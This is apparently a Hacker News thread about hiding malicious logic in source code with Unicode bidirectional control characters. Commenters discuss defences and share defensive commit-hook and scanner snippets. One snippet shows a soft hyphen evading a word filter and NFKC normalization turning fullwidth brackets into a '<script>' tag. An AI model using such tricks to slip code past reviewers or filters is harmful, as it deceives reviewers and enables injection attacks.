afrcnc | karma 3207 | avg karma 5.23 2021-11-01 06:40:33 | [–] similar comments

Duplicate: https://news.ycombinator.com/item?id=29061987

pweezy | karma 91 | avg karma 2.39 2021-11-01 06:59:33 | [–] similar comments

It’s not the same thing, but it brings to mind Ken Thompson’s famous “Reflections on Trusting Trust” [0] from 1984.

That describes a concept, over several stages, where a compiler can be made to change the behavior of programs it compiles in a difficult-to-find way.

[0]: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

sqs | karma 2979 | avg karma 4.61 2021-11-01 07:12:35 | [–] similar comments

Code search is helpful to see if any of your code contains these characters.

A bunch of hits found across the top ~2M open-source repositories: https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...

To triage, you probably want to first look at hits in code files (not JSON or Markdown, etc.):

https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...

You can set up a self-hosted instance of Sourcegraph to run this across all of your company's code: https://docs.sourcegraph.com/.

TacticalCoder | karma 9117 | avg karma 3.7 2021-11-01 07:30:16 | [–] similar comments

Honest question: would it be that bad to mandate and enforce 100% ASCII source files? Arguably every and any Unicode character and, well, arguably even any string of characters can (should?) go to a properties/resources file (properties/resources files which, btw, also greatly simplifies i18n/l10n).

Then build/commit/test hooks could be used to enforce that source code files are indeed 100% ASCII.
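A rough sketch of what such a hook could check, assuming Python 3.7+ is available where the hook runs. The names `non_ascii_lines` and `main` are made up for illustration, and how the list of files reaches the script is left open:

```python
def non_ascii_lines(data: bytes):
    """Return (line_number, line) pairs for lines containing non-ASCII bytes."""
    hits = []
    for number, line in enumerate(data.splitlines(), start=1):
        if not line.isascii():  # bytes.isascii() exists since Python 3.7
            hits.append((number, line))
    return hits


def main(paths) -> int:
    """Return 1 if any file has non-ASCII bytes, else 0 (hypothetical entry point)."""
    status = 0
    for path in paths:
        with open(path, "rb") as handle:
            for number, line in non_ascii_lines(handle.read()):
                print(f"{path}:{number}: non-ASCII bytes: {line!r}")
                status = 1
    return status
```

Calling `sys.exit(main(sys.argv[1:]))` from a hook script would turn a non-zero result into a rejected commit or failed build.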

I know, I know... Some are going to lament they don't have their shiny Unicode symbols right in their source file. But... It looks like you get what you pay for.

Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

EamonnMR | karma 4484 | avg karma 2.88 2021-11-01 07:43:03 | [–] similar comments

Having readable unicode in string literals is nice.

Jeff_Brown | karma 2659 | avg karma 1.8 2021-11-01 07:47:49 | [–] similar comments

> Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

It's astounding to me that there's room for such complexity in it. I thought it was just a lot of symbols. What other rules does Unicode have besides changing the order sometimes?

ncc-erik | karma 30 | avg karma 1.58 2021-11-01 11:43:21 | [–] similar comments

The one a lot of folks know about was the soft hyphen (U+00AD) to bypass swear filters. I was able to use normalization to create XSS attacks.
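Both tricks can be illustrated in a few lines of Python. This is only a sketch: the "filter" is a deliberately naive substring check and `BLOCKED_WORD` is a harmless stand-in, not a reconstruction of any real filter or of the actual XSS attacks.

```python
import unicodedata

BLOCKED_WORD = "darn"  # stand-in for a filtered word


def naive_filter_allows(text: str) -> bool:
    """A naive filter: plain substring match, no Unicode awareness."""
    return BLOCKED_WORD not in text


# U+00AD SOFT HYPHEN is usually invisible, yet it splits the substring.
sneaky = "da\u00adrn"
print(naive_filter_allows(sneaky))  # the naive check lets this through

# U+FF1C and U+FF1E are fullwidth angle brackets. A check for "<" misses
# them, but NFKC normalization folds them to ASCII "<" and ">".
payload = "\uff1cscript\uff1e"
print("<" in payload)
print(unicodedata.normalize("NFKC", payload))
```

The problem in the second case is ordering: if input is validated first and normalized afterwards, the normalization step can create characters the validator never saw.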

supperburg | karma 232 | avg karma 0.69 2021-11-01 07:55:40 | [–] similar comments

How dare you suggest something sensible. The mob will soon be knocking at your door.

sfgweilr4f | karma 606 | avg karma 3.42 2021-11-01 08:03:59 | [–] similar comments

Give it a few years and unicode will probably be turing-complete. For reasons... likely not good ones though.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:35:00 | [–] similar comments

Unicode rendering already requires multiple finite state machines.

sfgweilr4f | karma 606 | avg karma 3.42 2021-11-02 20:09:08 | [–] similar comments

Alternate cause of SkyNet: a distributed horde of unicode renderers become self-aware. Emojis become command and control codes.

btbuildem | karma 4755 | avg karma 2.82 2021-11-01 08:08:19 | [–] similar comments

That was my first thought -- run all your source through an ASCII-only filter, the problem goes away.

iforgotpassword | karma 7907 | avg karma 3.45 2021-11-01 09:08:20 | [–] similar comments

For projects like the Linux kernel this should be absolutely feasible. A few names in headers get mangled and lose their accents but that should be acceptable. Other projects... Well there's already a couple examples in this comment section why it won't be that easy.

thereddaikon | karma 2232 | avg karma 3.35 2021-11-01 08:17:28 | [–] similar comments

Seems the bigger complaint isn't the lack of fancy Unicode in comments; it's that non-English speakers with non-Latin alphabets won't be able to comment in their native language.

I'll leave it up to others to discuss how important this is or isn't.

dotancohen | karma 9525 | avg karma 1.72 2021-11-01 08:30:24 | [–] similar comments

Though I comment source in English, lots of people that I work with comment in other languages. ???? ?????, ????? ?????.?

InfiniteRand | karma 503 | avg karma 1.37 2021-11-01 09:40:55 | [–] similar comments

Might be nice to have an easy tool to scan files and whitelist characters from specific alphabets, because in most international teams I think you'll have a common language for comments, and so I think it's unlikely that you'll need say European and Indic and Chinese characters in one code base. Except the one pain point I can see - @author annotations in the source code, if you have an international team you might end up with a variety of scripts in that field, in my mind that's something that can be lived without, but I can imagine some people being sensitive about that.
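A small sketch of such a scanner in Python. One loud assumption: the standard library does not expose the Unicode Script property, so this uses the first word of each character's Unicode name (for example `LATIN`, `CYRILLIC`, `HEBREW`) as an approximation. The function name `disallowed_chars` is hypothetical.

```python
import unicodedata


def disallowed_chars(text, allowed_scripts=frozenset({"LATIN"})):
    """Return (index, char, name) for non-ASCII chars outside allowed scripts.

    Assumption: the first word of the Unicode character name stands in
    for the script, which is only an approximation.
    """
    hits = []
    for index, char in enumerate(text):
        if char.isascii():
            continue  # plain ASCII is always accepted
        name = unicodedata.name(char, "")
        script = name.split(" ", 1)[0] if name else ""
        if script not in allowed_scripts:
            hits.append((index, char, name or "<unnamed>"))
    return hits
```

With the default whitelist, accented Latin letters pass, while a Cyrillic homoglyph or a bidi control such as U+202E is reported. Passing `allowed_scripts={"LATIN", "CYRILLIC"}` would admit a second alphabet.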

SavantIdiot | karma 4263 | avg karma 2.96 2021-11-01 12:16:05 | [–] similar comments

Wouldn't simply stripping comments before doing any other processing solve the problem? I know there are plenty of programs that sprinkle code into comments, from Emacs to linters. Or is this obviously naive?

Seems to me that if you need to put code in the comments, you've got a bigger problem. I know people like tab hints and lint overrides, but maybe it is time to focus on separation of concerns at a higher level?

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:34:02 | [–] similar comments

> Wouldn't simply stripping comments before doing any other processing solve the problem?

No, because the exploit line doesn't contain a comment. It just looks like it does.

aidenn0 | karma 26449 | avg karma 2.17 2021-11-01 18:59:04 | [–] similar comments

Even ignoring the fact that non-english speakers will want to (and do; I worked on a compiler with SJIS support 20 years ago) write comments in their native languages, it's unavoidable to have non-ascii characters in your string literals unless you want to regress user-interfaces to 1980.

account42 | karma 5969 | avg karma 0.98 2021-11-02 10:06:40 | [–] similar comments

> it's unavoidable to have non-ascii characters in your string literal

It might not be ideal for you, but you can always use escape codes in your string literals so it is at least possible to avoid all non-ascii characters in your code.
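For instance, in Python (used here only as an illustration; most languages have a similar escape syntax) the source file stays pure ASCII while the runtime string does not:

```python
# The source text of this literal is pure ASCII...
greeting = "\u05e9\u05dc\u05d5\u05dd"  # Hebrew "shalom", written as escapes

# ...but the runtime value is made of Hebrew letters.
print(len(greeting))       # number of code points in the string
print(greeting.isascii())  # the value itself is not ASCII

# ascii() goes the other way: it renders any string as an ASCII-only literal.
print(ascii(greeting))
```

The cost is readability: a reviewer can no longer read the string without decoding it, which is the trade-off raised elsewhere in this thread.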

Pxtl | karma 17051 | avg karma 3.07 2021-11-01 07:36:03 | [–] similar comments

I skimmed the article but I didn't see any examples of this being exploited... Has anybody done a proof of concept on how Bidi can be used? I'm having trouble thinking of a line of code with a comment or literal where the code is legit forwards but malicious backwards.

sqs | karma 2979 | avg karma 4.61 2021-11-01 07:41:16 | [–] similar comments

This issue has been raised before, such as at https://github.com/golang/go/issues/20209 (I was reminded of that by https://twitter.com/peter_szilagyi/status/145515080347229798...). There is some other interesting discussion there.

pabs3 | karma 43824 | avg karma 6.39 2021-11-01 07:43:30 | [–] similar comments

Are there any linters that detect these sorts of issues?

marcodiego | karma 25112 | avg karma 7.05 2021-11-01 09:08:26 | [–] similar comments

I thought this was a case of Source code virus[1]. With the current popularity of open source and services like github, combined with deep inter-dependencies in node.js, a virus of this kind could have a huge impact if unnoticed for long enough.

Maybe it is the next plague waiting to happen?

[1] https://en.wikipedia.org/wiki/Source_code_virus

mwcampbell | karma 10942 | avg karma 3.15 2021-11-01 10:01:05 | [–] similar comments

> So you can use them in source code that appears innocuous to a human reviewer

To a sighted human reviewer. If I'm not mistaken, a blind programmer using a screen reader would be immune to this trick.

brazzy | karma 9490 | avg karma 2.91 2021-11-01 10:03:15 | [–] similar comments

If the screen reader understands Bidi (which it needs to in order to support some languages), maybe not.

throw10920 | karma 3071 | avg karma 2.05 2021-11-01 10:03:42 | [–] similar comments

Or, hear me out - instead of trying to work around a legitimate feature of Unicode, you could stop storing your source code as text, because it isn't. Code is not text - it's a tree of objects, and representing it as a flat sequence of text characters causes many problems and inefficiencies (including this one!) that could be mitigated if you just stored and manipulated it as a tree.

The only reason why text was justifiable as a storage and manipulation format for code in the first place was because early computers (probably?) couldn't handle a tree format. That excuse has been invalid for several decades now, as is the idea that "everything is plain text". Code isn't plain text - if it was, then you could make arbitrary edits without syntax errors, but you can't, because code has structure. Start treating it that way.

shaunxcode | karma 1706 | avg karma 2.08 2021-11-01 10:08:21 | [–] similar comments

Yes! This would also do away with a whole class of conflicts related to whitespace/formatting.

throw10920 | karma 3071 | avg karma 2.05 2021-11-01 13:42:36 | [–] similar comments

Exactly! Imagine a version control system where you get diffs on the AST tree, instead of the characters that make up the source (add an `if` and suddenly dozens of lines have "changed"), or the tabs/spaces flamewar evaporating instantly.

account42 | karma 5969 | avg karma 0.98 2021-11-02 10:12:55 | [–] similar comments

Nothing is stopping your current version control tool from parsing the code and showing a structural diff now.
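As a minimal sketch of the idea, assuming the code under version control is Python so that the standard `ast` module can parse it (the helper name `same_structure` is made up):

```python
import ast


def same_structure(source_a: str, source_b: str) -> bool:
    """True when two Python sources parse to the same syntax tree."""
    # ast.dump() omits line and column attributes by default, so layout
    # and comments do not affect the comparison.
    tree_a = ast.dump(ast.parse(source_a))
    tree_b = ast.dump(ast.parse(source_b))
    return tree_a == tree_b


before = "def f(x):\n    return x+1\n"
reformatted = "def f( x ):\n        return x + 1   # comment\n"
changed = "def f(x):\n    return x+2\n"

print(same_structure(before, reformatted))
print(same_structure(before, changed))
```

This only answers "did the tree change?"; a real structural diff would also have to report where the trees differ.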

rocqua | karma 9129 | avg karma 2.16 2021-11-01 10:41:21 | [–] similar comments

The thing about text is that it is barebones. Everyone can agree what the structure of text is (a stream of bytes with some ASCII-like encoding).

For representing code as more than text, you will lose so many tools that can handle your code, it's a massive setback. Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

throw10920 | karma 3071 | avg karma 2.05 2021-11-01 13:41:23 | [–] similar comments

> The thing about text is that it is barebones.

That's a bug. Programming is hard, and you want the best, most powerful tools to handle it as you can - which means putting effort into making specialized tools instead of using generic ones like text editors.

> For representing code as more than text, you will lose so many tools that can handle your code, it's a massive setback.

No tools existed without first being built, so this isn't special. Rust didn't have any tools before people started building tools for it, for instance.

Moreover, the tools that we have now that are text-specific are pathetic. You can view the first n lines of a file? Wow, very impressive /s. More complex things like grep are just as realizable in a structure editor, and in order to use them for non-trivial stuff, you'd have to write structural regular expressions and implement mini-parsers anyway - things you would get for free if you just kept code as structure.

> Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

You're misreading my argument. I'm not saying that people will adopt structured code (a descriptive statement), I'm saying that people should adopt structured code (a normative statement) because it'll be much better for them.

Also, you're making the assumption that onboarding is hard, and that compatibility layers can't exist - neither of which is true.

> Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

The average programmer probably looks at their code with a hex editor once in their life - this isn't really a good argument. Moreover, the vast majority of programmers already tolerate not looking under the hood in dozens of different ways - most use VMs like CPython/JVM/JS VMs, opaque frameworks like React/Angular, graphics APIs like OpenGL/DirectX/Vulkan, complicated editors like Visual Studio Code/Emacs, and far more without ever looking under the hood of any of those - so there's no reason to not add another layer (especially because you can build that layer to be easy to peer through) for the sake of productivity.

scintill76 | karma 1920 | avg karma 1.86 2021-11-01 13:55:43 | [–] similar comments

Also helps with naming. Only need a value once or twice? Don’t bother trying to name it, just link it into the tree where it’s needed.

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:13:36 | [–] similar comments

You can actually do that in Lisp. Lisp code is commonly thought of as a tree, but it is really a bunch of linked lists. The links can be arranged in any way you want.

http://www.lispworks.com/documentation/HyperSpec/Body/02_dhp...

The example shows this with some made–up data, but you can use it with arbitrary code as well. It is very easy to use it to create circular lists, which when executed are infinite loops.

Naturally the only sane thing to do is to keep your code strictly a tree.

a-dub | karma 3806 | avg karma 2.07 2021-11-01 10:58:05 | [–] similar comments

wasn't there something a while back where people were triggering buffer overflows in terminal emulators with malicious (and invisible to the pretty printed eye) escape codes?

ziml77 | karma 4073 | avg karma 2.52 2021-11-01 11:18:15 | [–] similar comments

Would the solution to this be to render the direction switch control character similar to how some text editors will render 0 bytes as a glyph with the text NUL? You could still render everything after it with the reversed direction, but it provides a visible indicator that it's been done. It might be a little annoying for people who use RTL languages, but it seems like the benefit may outweigh that.
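A simplified sketch of that idea in Python. It only substitutes a visible tag for each bidi control and leaves the text in logical order; it does not attempt the reordered rendering described above. The tags are the characters' usual abbreviations, and `reveal_bidi` is a hypothetical name.

```python
# The bidi control characters and their usual abbreviations.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def reveal_bidi(text: str) -> str:
    """Replace each bidi control character with a visible <TAG> marker."""
    return "".join(
        f"<{BIDI_CONTROLS[char]}>" if char in BIDI_CONTROLS else char
        for char in text
    )


print(reveal_bidi("access = 'user\u202e \u2066// admin check\u2069 \u2066'"))
```

Text without any of these characters passes through unchanged, so the marker only appears where a direction change was actually requested.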

pdonis | karma 17088 | avg karma 1.99 2021-11-01 11:34:24 | [–] similar comments

This article talks about compilers, but what about interpreted languages like Python or Lisp?

banana_giraffe | karma 4049 | avg karma 4.56 2021-11-01 11:59:21 | [–] similar comments

For anyone that wants to see the real code:

https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...

I've not seen one editor yet that doesn't at least hint there's a problem with syntax highlighting, if not just outright show nonsense.

SavantIdiot | karma 4263 | avg karma 2.96 2021-11-01 12:09:07 | [–] similar comments

This exploit requires comments.

I think most code is safe.

user2994cb | karma 131 | avg karma 1.41 2021-11-01 12:35:35 | [–] similar comments

I'm sure there are some creative uses in C-style comments for U+2215, Division Slash: /

WalterBright | karma 71923 | avg karma 2.96 2021-11-01 13:30:37 | [–] similar comments

Homoglyphs are a disaster and should never have been admitted into Unicode. There should never have been invisible semantic information embedded in Unicode.

Gunax | karma 1395 | avg karma 1.84 2021-11-01 14:59:03 | [–] similar comments

I am still confused. Is the text not visible?

If I write some text in a comment, it should still be visible, regardless of direction/bidi code, right?

Too | karma 4126 | avg karma 1.55 2021-11-02 00:45:21 | [–] similar comments

Is there any pre-commit check one can use to totally block this in my repo?

Others might have a legitimate use case for this, but I certainly don’t; we keep localization in known file types only.

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:25:08 | [–] similar comments

A pre–commit hook is just a script that returns 0 to allow the commit. If you want to block commits containing certain characters, just make a hook that runs grep with a suitable search expression and returns non-zero when it finds a match.
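A minimal sketch of a hook along those lines, written in Python rather than grep. The assumptions: the characters to reject are the bidi controls U+202A to U+202E and U+2066 to U+2069, files are UTF-8, and the function names are made up. How the staged file list reaches `main` depends on the hook setup and is left out.

```python
import re
import sys

# Assumption: these nine bidi control characters are the ones to reject.
BIDI_PATTERN = re.compile("[\u202a-\u202e\u2066-\u2069]")


def find_bidi(text: str):
    """Return (line_number, column, 'U+XXXX') for each bidi control found."""
    hits = []
    for line_number, line in enumerate(text.split("\n"), start=1):
        for match in BIDI_PATTERN.finditer(line):
            code = f"U+{ord(match.group()):04X}"
            hits.append((line_number, match.start() + 1, code))
    return hits


def main(paths) -> int:
    """Return 1 (block the commit) if any file contains a bidi control."""
    status = 0
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as handle:
            for line_number, column, code in find_bidi(handle.read()):
                print(f"{path}:{line_number}:{column}: bidi control {code}",
                      file=sys.stderr)
                status = 1
    return status
```

Ending the hook script with `sys.exit(main(sys.argv[1:]))` gives the exit-code behaviour described above: 0 allows the commit, anything else blocks it.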
